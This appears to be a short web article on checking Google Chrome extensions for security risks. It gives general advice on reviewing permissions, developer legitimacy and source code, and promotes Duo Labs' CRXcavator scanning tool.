Google Chrome Extension Security Check
Chrome extensions can have access to a user’s sensitive data. Extensions are also susceptible to cyberattacks.
During the installation workflow, many users grant permissions to an extension without much consideration. This is why it is crucial for IT teams to evaluate the risk of every extension before allowing them on their managed devices.
Check for Vulnerabilities
Chrome extensions are small plugin apps that reside inside a browser and can extend its capabilities. These apps can add a wide variety of functionalities to Google Chrome like password management, bookmark storage and translation services. But, they can also expose users to hackers who could intercept user information and personal data.
The best way to verify an extension’s security is by checking its developer’s legitimacy and looking at the description on the Chrome Web Store. The description should include a full list of permissions that the extension is granted and explain what it can do with your data. It should also note whether it’s collecting or transferring information to external servers. This way, you can evaluate the risk level of the extension’s functionality and decide whether or not to grant it access.
Check for Injections
The Google Web Store vets extensions for security issues before they can be approved. But attackers are able to trick this process with relatively little effort.
Once a malicious extension is installed, it can do anything from collecting browsing data to stealing user credentials. This is why it’s important for teams to review extensions regularly, not just when they first download them, but also after updates are pushed out.
One of the best ways to evaluate if an extension is safe is by looking at its source code. This can reveal whether there are risky or dangerous snippets of code that may expose users to malware and phishing attacks. It can also help teams determine whether an extension’s permissions level are appropriate for their work environment. Luckily, Duo Labs has just released a new tool that can automate this review and scan the full Chrome Web Store on an ongoing basis: CRXcavator. Duo is proud to partner with Google as a Chrome Enterprise customer to bring this tool to life and make it easier for teams to stay on top of their extensions.
Check for Cross-site Scripting
As extensions allow people to give them more and more permissions it’s important that they don’t steal data or otherwise violate users privacy. The prudent enterprise security team would evaluate every new extension before allowing it to enter the install workflow but that’s probably unrealistic.
It’s also worth looking at whether the extension has a professionally made website which gives it credibility and enables you to find if there are more details about the extension online. Also check whether it uses blob:// URLs for downloads which can be used to expose the contents of a PDF file or other sensitive information.
Check for Malware
Extensions often ask for a wide range of permissions to function. A prudent enterprise security team would evaluate every permission request before allowing the user to finish the extension install flow. But the reality is that this type of review is impractical for most organizations.
An extension’s functionality can change over time, and a malicious third party may be able to add malware or risky code snippets. This is one reason why Duo Labs recommends checking an extension’s reviews and the extension source code before installing it.
Chrome 117 will include a new feature that will alert users when an extension they previously installed has been unpublished by its developer, taken down for violating Chrome Web Store policies, or marked as malware. This is a great tool for helping to keep the browser and its extensions free of malware. It’s also a reminder to regularly check and update existing extensions to prevent them from becoming outdated and vulnerable to hackers.